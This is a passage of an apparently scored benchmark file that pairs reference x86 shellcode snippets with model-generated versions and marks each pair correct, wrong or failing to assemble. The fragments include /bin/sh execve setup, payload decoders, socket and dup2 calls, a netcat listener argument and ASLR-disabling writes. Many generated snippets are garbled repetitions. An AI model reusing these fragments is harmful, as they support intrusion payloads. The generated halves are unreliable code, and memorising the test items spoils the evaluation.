esp;0 +xor ax, bx \\n jz call_decoded;xor ax, bx \\n jz call decoded;0 +mov edx, 0x1234567;mov edx, 0x1234567;1 +mov [1000h], ax;mov ax, 1000h;GT: errorGenEXE +pop esi;pop esi;1 +call_egghunter:;call_egghunter:;1 +mov ebx, type var3;mov ebx, var3;GT: errorGenEXE +open:;open_label:;GT: errorGenEXE +mov ecx, esp;mov ecx, esp;1 +switch:;_switch:;GT: errorGenEXE +mov byte al, 0xa4;mov al, byte [0xa4];GT: errorGenEXE +2:;numeric 0x68732f2f \\n int 0x68732f \\n int 0x6e69622f \\n int 0x69622f \\n int 0x69622f \\n int 0x69622f \\n int 0x69622f \\n int 0x69622f;0 +push 0xb \\n pop eax;push 0x68732f2f \\n push 0x6e69622f \\n push 0x69622f \\n mov eax, esp;GT: errorGenEXE +mov al, 0xb \\n int 0x80;mov al, 0x68732f2f \\n int 0x68732f \\n int 0x6e69622f \\n int 0x69622f \\n int 0x69622f \\n int 0x6e69622f;GT: errorGenEXE +cmp BYTE al, 2 \\n je do_inject \\n jmp while;cmp al, 2 \\n jne while \\n jmp do_inject;GT: errorGenEXE +pop ebx;pop ebx;1 +push 0x10;push 0x68732f \\n push 0x68732f \\n push 0x6e69622f \\n push 0x69622f \\n push 0x69622f \\n push 0x69622f \\n push 0x69622f \\n push 0x69622f \\n push 0x69622f \\n push 0x69622f \\n push 0x69622f \\n push 0x69622f \\n push 0x69622f \\n push 0x69622f;GT: errorGenEXE +push byte 49;push byte 49;1 +mov al, 0x58;push ebx \\n push ebx \\n push ebx \\n push ebx \\n push ebx \\n push ebx \\n push ebx \\n push ebx \\n push ebx \\n push ebx \\n push ebx \\n push ebx \\n push ebx \\n push ebx \\n push ebx \\n push ebx \\n mov ebx, esp;GT: errorGenEXE +xor eax, eax \\n push eax;push edx;GT: errorGenEXE +cmp eax, ebx \\n je child;cmp eax, ebx \\n jne child;GT: errorGenEXE +mov ax, 8h;mov ax, 8h;1 +push 0x2f2f2f2f \\n mov ecx, esp;push 0x2f2f2f2f \\n mov ecx, esp;1 +"call shellcode \\n message db ""/bin/sh""";push of /bin/sh \\n push eip \\n mov shellcode_label, esp;0 +cmp bl, 0x1f;cmp bl, 0x1f;1 +decoder: \\n pop esi \\n mov edi, esi;pop esi \\n mov edi, [esi];GT: errorGenEXE +push 0x68736162;push 0x68736162;1 +mov eax, 63;mov eax, 0x68732f2f \\n int 0x68732f \\n int 0x6e69622f \\n int 0x69622f \\n int 0x69622f \\n int 0x69622f;GT: errorGenEXE +mov al,0xa2 \\n int 80h;int 0x80;GT: errorGenEXE +push eax \\n mov ebx, esp;push eax \\n mov ebx, esp;1 +xchg byte [esi+1], al;inc esi \\n inc esi \\n inc esi \\n inc esi \\n inc esi \\n inc esi \\n inc esi \\n inc esi \\n inc esi \\n inc esi \\n inc esi \\n inc esi \\n inc esi \\n inc esi \\n inc esi \\n inc esi \\n inc esi \\n inc esi \\n inc esi \\n inc esi \\n inc esi \\n inc esi \\n inc esi \\n inc esi \\n inc esi \\n inc;0 +jmp short enc;jmp short enc;1 +mov al,0x8 \\n mov cl,077o;reate: \\n push 0x77 \\n push 0x77 \\n push 0x77 \\n push 0x77 \\n push 0x77 \\n push 0x77 \\n push 0x77 \\n push 0x77 \\n push 0x77 \\n push 0x77 \\n push 0x77 \\n push 0x77 \\n push 0x77 \\n push 0x77 \\n push 0x77 \\n push 0x77 \\n push 0x77 \\n push 0x77 \\n push 0x77 \\n mov 0x77, 0x;0 +stage:;_stage:;GT: errorGenEXE +mov dl, 0x45;mov dl, 0x45;1 +inc esi \\n jmp L1;inc L2 \\n jmp L2;0 +movq mm0, qword [edi];mov mm0, \xor_value\;0 +mov byte [esi], dl;mov dl, byte [esi];GT: errorGenEXE +inc edi;inc edi;1 +xor eax, [edi];xor eax, edi;GT: errorGenEXE +mov al, 0x17;xor 0x17, 0x17;0 +mov [esi+35], esi;mov esi+35, esi;0 +dec ecx;dec ecx;1 +push word 0x3436;push word 0x3436;1 +call jmp_search;call jmp_search;1 +write_syscall equ 4;write_syscall equ 4;1 +cmp BYTE [esi], 0x7 \\n jle lowbound;cmp BYTE [esi], 0x7 \\n jl lowbound;GT: errorGenEXE +add eax, 2;add eax, 2;1 +push byte 4 \\n pop eax;push byte 4 \\n pop eax;1 +push 0x64687373 \\n mov edi, esp;push 0x64687373 \\n mov edi, esp;1 +jmp short four;jmp short four;1 +xchg ebx, eax;xchg ebx, eax;1 +buffersize: dw 1024;buffersize word 0x68732f \\n 0x68732f \\n 0x6e69622f \\n 0x69622f \\n 0x69622f \\n 0x69622f \\n 0x69622f \\n 0x69622f \\n 0x69622f \\n 0x69622f \\n 0x69622f \\n 0x69622f \\n 0x69622f \\n 0x69622f \\n 0x69622f \\n 0;0 +pop esi \\n mov bx, [esi];pop esi \\n mov bx, [esi];1 +push eax \\n push 0x636e2f6e \\n push 0x69622f2f;push 0-term \\n push cn/n \\n push ib//;0 +push 0x2;push for \\n push af_inet;GT: errorGenEXE +mov ecx, eax;mov ecx, eax;1 +push word 0x8223;push word 0x8223;1 +push 0x1ff9090 \\n pop ecx;push 0x1ff9090 \\n push ecx \\n push 0x10 \\n push 0x1ff9090 \\n push ecx \\n push 0x10 \\n mov 0x10, esp;0 +cmp edx, 42;cmp edx, 42;1 +push esi;push sockfd;GT: errorGenEXE +close:;close_label:;GT: errorGenEXE +pop ecx \\n loop l1 \\n mov eax, 1;pop ecx \\n dec ecx \\n jmp l1;GT: errorGenEXE +matrix qw 12*10;for: \\n 12*10: \\n quad-bytes:;0 +F5: \\n jmp L1;F5: \\n jmp L1;1 +mov bl, 0xe;mov bl, 0xe;1 +mov al, 0x01;mov byte [eax], 0x1;GT: errorGenEXE +R1: \\n inc esi \\n inc esi;inc R1 \\n inc esi;0 +xor byte [esi], 0x2c;xor 0x2c, esi;0 +mov edi, 0x978cd092 \\n mov ebx, edi;push 0x978cd092 \\n pop edi \\n pop ebx;GT: errorGenEXE +mov ebx, esp;mov ebx, ptr;0 +lea ebx, [esp];mov ebx, esp;GT: errorGenEXE +push 0x74756f2f;push 0x74756f2f;1 +loop bucle;dec ecx \\n jns bucle;GT: errorGenEXE +push 0x3a303a3a;push 0x3a303a3a;1 +jns loop2;jns _loop2;GT: errorGenEXE +push 0x30;push 0x30;1 +S1: db 0xc0, 0x31, 0x68, 0x50, 0x2f, 0x2f, 0x68, 0x73;0xc0, 0x31, 0x68, 0x50, 0x2f, 0x2f, 0x68, 0x73 db 0xc0, 0x31, 0x68, 0x50, 0x2f, 0x2f, 0x68, 0x73;0 +F1: \\n pop esi;F1: \\n pop esi;1 +push 0x68732f2f \\n push 0x6e69622f \\n mov eax, esp;mov eax, ASCII /bin/sh;0 +mov cx, 2001Q;mov cx, 2001Q;1 +jne no_error;jne no_error;1 +cmp cl, 0x11 \\n jb 0xff \\n add dl, 0x5;cmp cl, 0x11 \\n add dl, 0x5;GT: errorGenEXE +xor eax, 0x58494741;xor eax, 0x58494741;1 +L3: \\n jmp edi;L3: \\n jmp edi;1 +push ebx;push ebx;1 +xor ecx, ecx \\n mov cl, shellcode_length;xor shellcode_length, shellcode_length \\n mov byte [shellcode_length], shellcode_length;0 +mov al, 0x42;mov al, 0x42;1 +mov byte [esp], 0x2f;mov byte [var1], 0x2f;GT: errorGenEXE +xor ebx, ebx \\n xor edx, edx;xor ebx, ebx \\n mul ebx;GT: errorGenEXE +mov dword [esp-4], esi;mov dword [[], esi;0 +mov [esi], al;mov esi, al;0 +xor ecx, ecx \\n mul ecx;xor eax, eax \\n xor ecx, ecx;GT: errorGenEXE +jmp short decode_pr;decode_pr: \\n inc decode_pr;0 +function_5: \\n call [esp];function_5: \\n int 0x80;GT: errorGenEXE +mov cl, 100;mov cl, 100;1 +xchg esi, eax;mov esi, esp;GT: errorGenEXE +mov al, 0x66;mov al, 0x66;1 +xor edx, edx \\n push edx;push edx;GT: errorGenEXE +loop l4 \\n mov edx, esp;loop l4 \\n mov edx, esp;1 +sub ecx,ecx \\n push ecx;xor ecx, ecx \\n push ecx;GT: errorGenEXE +shellcode: db 0xc6,0x02,0x80,0x01,0x81,0x03,0xd1,0x01,0xbe,0x02,0x5f,0x01,0x98,0x03,0x1c,0x06,0x60,0x08,0xf6,0x04,0xc5,0x01,0x92,0x04,0x30,0x07,0x64,0x06,0x3a,0x04,0x58,0x08,0x4f,0x03,0x59,0x05,0xd2,0x06,0x81,0x08,0x1a,0x04,0x5f,0x07,0x03,0x08,0xd8,0x04,0x0c,0x04, 0xbb, 0xbb;shellcode: db 0xc6,0x02,0x80,0x01,0x81,0x03,0xd1,0x01,0xbe,0x02,0x5f,0x01,0x98,0x03,0x1c,0x06,0x60,0x08,0xf6,0x04,0xc5,0x01,0x92,0x04,0x30,0x07,0x64,0x06,0x3a,0x04,0x58,0x08,0x4f,0x03,0x59,0x05,0xd2,0x06,0x81,0x08,0x1a,0x04,0x5f,0x07,0x03,0x08,0xd8,0x04,0x0c,0x04, 0xbb, 0xbb;1 +mov edx, ecx;mov edx, ecx;1 +test eax, eax \\n jz short loc_402B13;test eax, eax \\n jz short loc_402B13;1 +add eax, 0x10;add eax, 0x10;1 +mov ecx, ebp;mov ecx, ebp;1 +push 0x1;push socket_type \\n push = \\n push sock_stream;0 +add ax, [di + 20];add ax, di + 20;0 +mov al,0x6;mov al, 0x68732f2f \\n mov al, 0x68732f \\n mov al, 0x6e69622f \\n mov al, 0x69622f \\n mov al, 0x69622f \\n mov al, 0x69622f \\n mov al, 0x69622f \\n mov al, 0x6e69622f \\n mov al, 0x69622f \\n mov al, 0x6e69622f \\n mov al, 0x69622;GT: errorGenEXE +dec esp;dec esp;1 +push eax;push 0x68732f2f \\n push 0x6e69622f \\n push 0x69622f \\n push 0x69622f \\n push 0x69622f;GT: errorGenEXE +sub eax,20000h;sub eax, 20000h;1 +section .bss;section \\n uninitialized: db 0x68732f2f \\n db 0x6e69622f \\n db 0x69622f \\n db 0x69622f \\n db 0x69622f \\n db 0x69622f \\n db 0x69622f \\n db 0x69622f \\n db 0x69622f \\n db 0x69622f \\n db 0x69622f \\n db 0x69622f2f \\n db 0x69622;GT: errorGenEXE +pop cx;pop cx;1 +push 0x6475732f \\n push 0x6374652f \\n mov eax, esp;push 0x6475732f \\n push 0x6374652f \\n mov eax, esp;1 +mov ecx, esp;mov ecx, args;GT: errorGenEXE +cmp al, 0xf2;cmp al, 0xf2;1 +db 0c6h;db '0c6h';GT: errorGenEXE +cmp eax, eax \\n jne 0x8;cmp eax, eax \\n jne 0x8;1 +xor ax, 0x3041;xor ax, 0x3041;1 +jnz decode;jz _decode;GT: errorGenEXE +pop ecx \\n mov edi, ecx;pop ecx \\n pop stak \\n mov edi, esp;0 +add eax, ebx;add eax, ebx;1 +push 0x2f2f2f2f \\n mov esi, esp;push 0x2f2f2f2f \\n mov esi, esp;1 +mov cl, al;backup al;0 +push ecx;push host_sockfd;GT: errorGenEXE +find_address:;find_address:;1 +shl edx, 9;shl edx, 9;1 +dup2:;_dup2:;GT: errorGenEXE +three:;_three:;GT: errorGenEXE +L1: \\n jmp short esp;jmp short esp;GT: errorGenEXE +push byte 10;push byte 10;1 +wrap_around:;_wrap_around:;GT: errorGenEXE +cmp bl, 78h \\n jge short loc_402B1D;cmp bl, 78h \\n jge loc_402B1D;GT: errorGenEXE +_start: \\n jmp short enc;_start: \\n jmp short enc;1 +push word 0x5c11;push 0x68732f \\n push 0x68732f \\n push 0x6e69622f \\n push 0x69622f \\n push 0x69622f \\n push 0x69622f \\n push 0x69622f \\n push 0x69622f \\n push 0x69622f \\n push 0x69622f \\n push 0x69622f \\n push 0x69622f \\n push 0x69622f \\n push 0x69622f;GT: errorGenEXE +read:;read_label:;GT: errorGenEXE +mov bl, byte [edi];mov bl, byte [edi];1 +db '/bin/sh';db '/bin/sh';1 +priv_setgid:;_ priv_setgid:;0 +sub edx, edx;xor edx, edx;GT: errorGenEXE +mov bl, 4;mov: \\n =: \\n var2: \\n sys_listen: \\n bl:;0 +mov ecx, esp;mov ecx, ptr;0 +mov ebx, esp;ebx:;0 +cdq \\n push edx;xor edx, edx \\n push edx;GT: errorGenEXE +xor bl, 0xaa \\n jne encodedshellcode;xor bl, 0xaa \\n jnz encodedshellcode;GT: errorGenEXE +xor edx, edx;xor edx, edx;1 +push 0x6374652f \\n mov esi, esp;push 0x6374652f \\n mov esi, esp;1 +push byte 0x2 \\n pop eax;push byte 0x2 \\n pop eax;1 +sub ecx, ecx;sub ecx, ecx;1 +xor edx, edx \\n mov dl, 5;xor edx, edx \\n mov byte [edx], 5;GT: errorGenEXE +jmp short stage;jmp short _stage;GT: errorGenEXE +sub ax, 1564;sub ax, 1564;1 +shell_ret:;shell_ret:;1 +mov cx,0x3b30 \\n push cx;push 15152 \\n push 15152 \\n push 15152 \\n push 15152 \\n push 15152 \\n push 15152 \\n push 15152 \\n push 15152 \\n push 15152 \\n push 15152 \\n push 15152 \\n push 15152 \\n push 15152 \\n push 15152 \\n push 15152 \\n push 15152 \\n push 15152 \\n push 15152 \\n push 15152 \\n push 15152 \\n push 15152 \\n;0 +cmp byte [buff], 7ah;cmp byte [buff], 7ah;1 +push 0x67513231;push 0x67513231;1 +push 2;push 0x68732f2f \\n push 0x68732f \\n push 0x6e69622f \\n push 0x69622f \\n push 0x69622f \\n push 0x69622f \\n push 0x6e69622f \\n push 0x69622f \\n push 0x69622f \\n push 0x69622f \\n push 0x69622f \\n push 0x69622f \\n push 0x69622f \\n push 0x;GT: errorGenEXE +push 0x10;push 0x10;1 +push eax \\n pop edx;mov edx, eax;GT: errorGenEXE +message: db 'hello world!';message db 'hello world!';GT: errorGenEXE +mov eax, 3;mov sys_read, esp;0 +db 'egg mark';db 'egg mark';1 +xor edx, edx;xor edx, edx;1 +jmp short push_cmd;jmp short push_cmd;1 +decode:;decode:;1 +xor cl, 0x32;xor cl, 0x32;1 +cmp bl, 0xbb \\n je xordecode \\n jmp notdecode;cmp bl, 0xbb \\n jge xordecode \\n jmp notdecode;GT: errorGenEXE +mov ebx, [ebp-4];push [\\n pop ebp-4 \\n pop] \\n pop ebx;0 +push byte +0x68;push byte +0x68;1 +mov cx, 0700;mov cx, 0700;1 +cdq;edx:;0 +mov al, 0xcd;mov al, 0xcd;1 +xor cl, 0xaa;xor cl, 0xaa;1 +cmp al, 0xf2;cmp al, 0xf2;1 +mov al, 11;mov al, 0x68732f2f \\n int 0x68732f \\n int 0x6e69622f \\n int 0x69622f \\n int 0x69622f \\n int 0x6e69622f;GT: errorGenEXE +push 15 \\n mov ecx, esp;push ecx \\n mov ecx, 15;GT: errorGenEXE +xchg eax, ebx;xchg eax, ebx;1 +push byte 16 \\n pop eax;push byte 16 \\n pop eax;1 +mov long [esi+26], eax;mov eax, [esi+26];GT: errorGenEXE +mov dword [esp-0x4],eax \\n mov dword [esp-0x8],0x65636170 \\n mov dword [esp-0xc],0x735f6176 \\n mov dword [esp-0x10],0x5f657a69 \\n mov dword [esp-0x14],0x6d6f646e \\n mov dword [esp-0x18],0x61722f6c \\n mov dword [esp-0x1c],0x656e7265 \\n mov dword [esp-0x20],0x6b2f7379 \\n mov dword [esp-0x24],0x732f636f \\n mov dword [esp-0x28],0x72702f2f \\n sub esp,0x28 \\n mov ebx,esp;push proc/sys/kernel/randomize_va_space \\n push eax \\n mov ebx, esp;0 +mov bl, 0x2;mov bl, 0x2;1 +push 0x37333333 \\n push 0x3170762d;push '-vp13337';GT: errorGenEXE +push 0x2f2f2f2f;push 0x2f2f2f2f;1 +lea esi, [esi +4];push [\\n pop esi +4;0 +scasd;cmp dword [edi], eax;GT: errorGenEXE +mov ecx,esp;mov ecx, esp;1 +mov eax, [ebx+8];mov eax, byte [ebx+8];0 +bound esp,qword ptr [ebx+0x41];bound ebx, 0x68732f2f, 0x6e69622f, 0x69622f, 0x69622f, 0x69622f, 0x69622f, 0x69622f, 0x69622f, 0x69622f, 0x69622f, 0x69622f, 0x69622f, 0x69622f;0 +push ebx;push 0x68732f2f \\n push 0x6e69622f \\n push 0x69622f \\n push 0x69622f;GT: errorGenEXE +int 3;mov breakpoint, esp;0 +xor ecx, ecx \\n xor eax, eax \\n xor edx, edx;xor ecx, ecx \\n xor eax, eax \\n xor edx, edx;1 +push 0x10 \\n push ecx \\n push edx;push sizeof(struct;0 +cmp bl, 0xaa \\n je shellcode;cmp bl, 0xaa \\n jz shellcode;GT: errorGenEXE +push edx \\n mov ecx, esp;push edx \\n mov ecx, esp;1 +mov bl, 0xff;pop bl;0 +xor eax, eax \\n xor edx, edx;xor eax, eax \\n xor edx, edx;1 +mov al,2;mov al, __nr_fork;GT: errorGenEXE +cmp ecx, ebp;cmp ecx, ebp;1 +xchg esp, esi;xchg esi, esp;GT: errorGenEXE +push dword ebx \\n push dword ebx;push dword 0x2 \\n push dword 0x2 \\n push dword 0x2 \\n push dword 0x2 \\n push dword 0x2 \\n push dword 0x2 \\n push dword 0x2 \\n push dword 0x2 \\n push dword 0x2 \\n push dword 0x2 \\n push dword 0x2 \\n push dword 0x2 \\n push dword 0x2 \\n push dword 0x2 \\n push dword 0x2 \\n push dword 0x2;GT: errorGenEXE +push 0x6d726574;push 0x6d726574;1 +mov al, 0x3f;push sys \\n push for \\n push dup2 \\n mov al, 0x68732f2f \\n mov dup2, 0x6e69622f \\n mov for, 0x69622f \\n mov dup2, 0x69622f \\n mov dup2, 0x69622f \\n mov for, 0x69622f2f \\n mov dup2, 0x69622f \\n mov dup2, 0x69622f \\n mov for, 0x69622f;0 +call decoder;jmp zero68732f \\n jmp zero68732f \\n jmp zero68732f \\n jmp zero68732f \\n jmp zero6e69622f \\n jmp zero69622f \\n jmp zero69622f \\n jmp zero69622f \\n jmp zero69622f \\n jmp zero69622f \\n jmp zero69622f \\n jmp zero69622f \\n jmp zero69622f \\n jmp zero69622f;GT: errorGenEXE +test al, al \\n jz found \\n inc ecx;cmp al, ecx \\n jz found \\n inc ecx;0 +mov bl, 5;mov bl, 5;1 +int 0x80;int 0x80;1 +marks dw 0, 0, 0, 0;for: dd 0x68732f \\n dd 0x68732f \\n dd 0x6e69622f \\n dd 0x69622f \\n dd 0x69622f \\n dd 0x69622f \\n dd 0x69622f \\n dd 0x69622f \\n dd 0x69622f \\n dd 0x69622f \\n dd 0x69622f \\n dd 0x69622f \\n dd 0x69622f \\n dd 0x6;GT: errorGenEXE +push eax;push edx;GT: errorGenEXE +sub eax, 0x013ffeff \\n push eax;push ' in/c';GT: errorGenEXE +xor ebx, ebx \\n mov ebx, eax;xor ebx, ebx \\n mov eax, eax;GT: errorGenEXE +pop esi;pop esi;1 +mov al, 102 \\n int 80h;push 0x68732f2f \\n push 0x6e69622f;GT: errorGenEXE +push ebx;push ebx;1 +xchg ebx, ecx;xchg ecx, ebx;GT: errorGenEXE +mov ecx,eax \\n push ecx;mov ecx, eax \\n push ecx;1 +add ax, bx;add ax, bx;1 +decode:;decode:;1 +push byte 0x77;push byte 0x77;1 +lea ebx, [esp];mov ebx, esp;GT: errorGenEXE +push eax \\n push dword 0x64616568 \\n push dword 0x2f6e6962 \\n push dword 0x2f2f2f2f \\n push dword 0x7273752f;push 0-term \\n push daeh \\n push rsu/ on;0 +push ebx;push 0x68732f \\n push 0x68732f \\n push 0x6e69622f \\n push 0x69622f \\n push 0x69622f \\n push 0x69622f \\n push 0x69622f \\n push 0x69622f \\n push 0x69622f \\n push 0x69622f \\n push 0x69622f \\n push 0x69622f \\n push 0x69622f \\n push 0x69622f;GT: errorGenEXE +xor eax, 0xffffffff;xor 0xffffffff, 0xffffffff \\n xor eax, eax;0 +add al,0x3b;add al, 0x3b;1 +mov [esi], al;mov esi, al;0 +mov eax, 1;mov eax, 1;1 +xor ebx, ebx \\n push ebx;push edx;GT: errorGenEXE +push eax \\n mov edx, esp \\n push ebx \\n mov ecx, esp \\n mov al, 0xb \\n int 0x80;int 0x80;GT: errorGenEXE +entrypoint:;entrypoint:;1 +mov dl, 0x1c;mov dl, 0x1c;1 +sub byte [ebp+ecx],20h;sub ecx, 20h;GT: errorGenEXE +push ecx;push ecx;1 +mov ebx, esp;mov ebx, esp;1 +mov edi, 0x3734b117;mov edi, 0x3734b117;1 +xor byte [esi + ecx - 1], 0x3;xor byte [esi + ecx - 1], bh;GT: errorGenEXE +sub byte [esi], 13;sub byte [esi], 13;1 +push eax;push eax(socket;0 +mov edx, ecx;mov edx, esp;GT: errorGenEXE +mov [ebx+8], ebx;mov [ebx + 8], ebx;1 +push 0x2 \\n pop ecx;push 0x2 \\n pop ecx;1 +lea edx, [esi+0x10];lea edx, [esi+0x10];1 +mov eax, 19;mov byte [esi], 0x68732f2f \\n mov byte [esi], 0x68732f \\n mov byte [esi], 0x6e69622f \\n mov byte [esi], 0x69622f \\n mov byte [esi], 0x69622f \\n mov byte [esi], 0x6e69622f \\n mov byte [esi], 0x69622f2f \\n mov byte [esi], 0x69622f;GT: errorGenEXE +arr1 resb 400;push byte 0x68732f2f \\n push byte 0x68732f \\n push byte 0x6e69622f \\n push byte 0x69622f \\n push byte 0x69622f \\n push byte 0x69622f \\n push byte 0x69622f \\n mov uninitialized, esp;0 +xor cl, 0XAA \\n jz shift_decode;xor cl, 0xAA \\n jz shift_decode;GT: errorGenEXE +nop;xor eax, 0x68732f2f \\n xor eax, 0x68732f \\n xor eax, 0x6e69622f \\n xor eax, 0x69622f \\n xor eax, 0x69622f \\n xor eax, 0x69622f \\n xor eax, 0x69622f \\n xor eax, 0x69622f2f \\n xor eax, 0x69622f2f \\n xor eax, 0x69622f;GT: errorGenEXE +decoded_shellcode: \\n call [esp];decoded_shellcode: \\n call stack;GT: errorGenEXE +mov eax, 90;mov eax, 0x68732f2f \\n mov eax, 0x68732f \\n mov eax, 0x6e69622f \\n mov eax, 0x69622f \\n mov eax, 0x69622f \\n mov eax, 0x69622f \\n mov eax, 0x6e69622f \\n mov eax, 0x69622f \\n mov eax, 0x69622f2f \\n mov eax, 0x69622f;GT: errorGenEXE +cmp ax, bx \\n jne l3 \\n jmp while;cmp ax, bx \\n jne while;GT: errorGenEXE +format:;format:;1 +mul ebx;mul ebx;1 +lea edi, [esi];push 0x68732f2f \\n push 0x6e69622f \\n push 0x69622f \\n push 0x69622f \\n push 0x69622f \\n push 0x69622f \\n mov edi, esp;GT: errorGenEXE +push edx;push edx;1 +L4: \\n jmp short esp;L4: \\n jmp short stack;GT: errorGenEXE +push dword 0x8140a8c0;push dword 0x8140a8c0;1 +mov esi, 10;mov esi, 10;1 +jmp short setup;jmp short _setup;GT: errorGenEXE +push 0x6e69622f \\n push 0x7273752f \\n mov ebx, esp;push 0x6e69622f \\n push 0x7273752f \\n mov ebx, esp;1 +hlt;xor until, until \\n sub until, 0x68732f2f \\n sub until, 0x6e69622f \\n xor until, 0x69622f \\n xor until, 0x69622f \\n xor until, 0x69622f \\n xor until, 0x69622f \\n xor until, 0x69622f \\n xor until, 0x69622f \\n xor until, 0x69622f \\n xor until, 0x;0 +mov eax, edx;mov eax, edx;1 +call _myfunc;call _myfunc;1 +sub byte [esi], 0xd;sub byte [esi], 0xd;1 +push edx;push edx;1 +cmp ecx, 5;cmp ecx, 5;1 +jns decode_pr;jns decode_pr;1 +zero1e:;_zero1e:;GT: errorGenEXE +int 80h;call sys_read;GT: errorGenEXE +push ecx \\n push 0x68736162 \\n push 0x2f6e6962 \\n push 0x2f2f2f2f;push ecx \\n push cotent \\n push 'hsab' \\n push '/nib' \\n push '////';0 +"call _appendfile \\n msg2 db ""passwd"", 0x00";inc _appendfile \\n inc _appendfile \\n inc _appendfile \\n inc _appendfile \\n inc _appendfile \\n inc _appendfile \\n inc _appendfile \\n inc _appendfile \\n inc _appendfile \\n inc _appendfile \\n inc _appendfile \\n inc _appendfile \\n inc _appendfile \\n inc istruction \\n inc istruction \\n inc istruction \\n inc istruction \\n inc pf;0 +xor ecx, ecx \\n mul ecx;xor eax, eax \\n xor edx, edx;GT: errorGenEXE +D2: \\n not byte [esi];D2: \\n not byte [esi];1 +mul ebx;xor eax, eax;GT: errorGenEXE +_write:;_write:;1 +inc cl;inc cl \\n inc cl;GT: errorGenEXE +mov esi, 0x353ffc3b;mov esi, 0x353ffc3b;1 +mov ecx, edx;mov ecx, edx;1 +inc ebx;inc ebx;1 +push 0x78;push 0x78;1 +mov ecx,esp;mov ecx, esp;1 +xor ah, ah;xor ah, ah;1 +_load_data:;_load_data:;1 +push ebx \\n push ebx \\n push esi;push ebx \\n push esi;GT: errorGenEXE +test eax, eax \\n jnz checkforfile;test eax, eax \\n jz checkforfile;GT: errorGenEXE +push edx;push edx;1 +mov cl,0x2;mov cl, 2;GT: errorGenEXE +rol edx, 0x4;rol edx, 4;GT: errorGenEXE +mov edi, ecx;mov edi, ecx;1 +mov edi, edx;mov edi, edi;GT: errorGenEXE +xor ebx,eax;xor ebx, ebx \\n xor eax, eax;GT: errorGenEXE +push byte 67 \\n pop eax;push byte 67 \\n pop eax;1 +mov esi, eax;mov esi, eax;1 +push ebx;push ebx;1 +mov dl, 0x02;mov dl, 0x02;1 +lea edi, [esi +1];mov edi, [esi];GT: errorGenEXE +sub ebx, 0x2e2aa163;sub ebx, 0x2e2aa163;1 +xor bx, bx;xor bx, bx;1 +F2: \\n call function_1;F2: \\n call function1;GT: errorGenEXE +xor ecx, ecx \\n mul ecx;xor ecx, ecx \\n mul ecx;1 +cmp al, 0xf2 \\n jz next_page;test efault, efault \\n jmp next_page;0 +int 0x80;init:;GT: errorGenEXE +div edx;div edx;1 +mov eax, [x];mov eax, [x];1 +cmp eax, ebx \\n je all;cmp eax, ebx \\n jne all;GT: errorGenEXE +my_table times 10 dw 0;push 0x68732f2f \\n push 0x68732f \\n push 0x6e69622f \\n push 0x69622f \\n push 0x69622f \\n push 0x69622f \\n push 0x69622f \\n mov my_table, esp;0 +push 0x706d742f;push 0x706d742f;1 +mov ax, 1;mov ax, 1;1 +mov al, 5;mov al, 5;1 +scasd;cmp eax, dword [edi] \\n not dword [edi];GT: errorGenEXE +ret;pop that;0 +mov al, dl;mov al, dl;1 +sub [var2], esi;sub var2, esi;0 +sub ecx, 23;sub ecx, 23;1 +push edi \\n mov eax, esp;push edi \\n mov eax, esp;1 +test eax, eax \\n jz write \\n xor eax, eax;test eax, eax \\n jz write;GT: errorGenEXE +lea ebx, [edx+0x4];mov ebx, edx+0x4;0 +cmp [ebp+var_a], 0;cmp [ebp+var_a], 0;1 +inc ebx \\n push ebx;push 1;GT: errorGenEXE +word1 word 65535;word1: db 65535;GT: errorGenEXE +sub cx, cx;sub cx, cx;1 +mov ebx, 4;mov eax, 0x68732f2f \\n int 0x6e69622f \\n int 0x69622f \\n int 0x69622f \\n int 0x69622f \\n int 0x69622f \\n int 0x69622f \\n int 0x6e69622f \\n int 0x69622f \\n int 0x6e69622f \\n int 0x6e69622f \\n int 0x6e69622f \\n int 0x;GT: errorGenEXE +incpage:;incpage:;1 +push word 0x632d \\n mov edi, esp;push word 0x632d \\n mov edi, esp;1 +push ecx;push ecx;1 +test eax, eax \\n js _while_loop;test eax, eax \\n jns _while_loop;GT: errorGenEXE +mov ecx,esp;mov ecx, esp;1 +cmp dword ptr [eax],edx \\n jne loop;edx: \\n dword ptr 0x68732f2f \\n dword ptr 0x68732f \\n dword ptr 0x6e69622f \\n dword ptr 0x69622f \\n dword ptr 0x69622f \\n dword ptr 0x69622f \\n dword ptr 0x69622f \\n dword ptr 0x69622f \\n dword ptr 0x69622f \\n dword ptr 0x69622f \\n dword ptr 0x696;0 +jne encodedshellcode;jz _encodedshellcode;GT: errorGenEXE +me:;me:;1 +push ebx;push 0x68732f \\n push 0x6e69622f \\n push 0x69622f \\n push 0x69622f;GT: errorGenEXE +cld;xor ecx, ecx \\n mul ecx;GT: errorGenEXE +sub eax, ebx;sub eax, ebx;1 +mov bl,0x3;push 0x3 \\n pop bl;0 +cmp al, 0xf2 \\n jz _start;cmp al, 0xf2 \\n jge _start;GT: errorGenEXE +lea ecx, [esi + 8];lea ecx, [esi+8];1 +xor ebx, ebx;xor ebx, ebx;1 +mov ax, 1666;mov ax, 1666;1 +mov ebx, esp;mov ebx, esp;1 +push dword 0x61722f6c;push dword 0x61722f6c;1 +cmp cl, 0x11 \\n jb 0xff \\n add dl, 0x5;cmp cl, 0x11 \\n jl 0xff \\n add dl, 0x5;GT: errorGenEXE +loop l4 \\n mov edx, esp;loop l4 \\n mov edx, esp;1 +mov cl, 4;mov cl, 4;1 +loop decode \\n jmp Shellcode;loop decode \\n jmp Shellcode;1 +xchg eax, ebx;xchg eax, ebx;1 +cmp byte [esi], 0xD \\n jl wrap_around;cmp byte [esi], 0xD \\n jl wrap_around;1 +mov byte [esi + 1], dl;mov [esi+1], dl;GT: errorGenEXE +mov al, 0x3f;push 63 \\n pop 63;0 +push 0xdebf;push 0xdebf;1 +section .text;section;GT: errorGenEXE +mov al, 15;mov byte [eax], 15;GT: errorGenEXE +push eax;push edx;GT: errorGenEXE +push dword 0x2f2f2f2f \\n push dword 0x7273752f \\n mov ebx, esp;push dword 0x2f2f2f2f \\n push dword 0x7273752f \\n mov ebx, esp;1 +lea ecx, [esp];mov ecx, esp;GT: errorGenEXE +push 0x69622f3a;push 0x69622f3a;1 +push eax;push eax;1 +mov eax, msg1;mov eax, msg1;1 +lea ecx, [zero_reg+117];push 0x68732f2f \\n push 0x6e69622f \\n push 0x69622f \\n push 0x69622f \\n push 0x69622f \\n push 0x69622f \\n push 0x69622f \\n push 0x69622f \\n mov ecx, esp;GT: errorGenEXE +mov dword [esp-0x24], 0x732f636f;mov dword [0x732f636f], 0x732f636f;GT: errorGenEXE +push 0x6873732f \\n push 0x6374652f \\n mov edx, esp;push 0x6873732f \\n push 0x6374652f 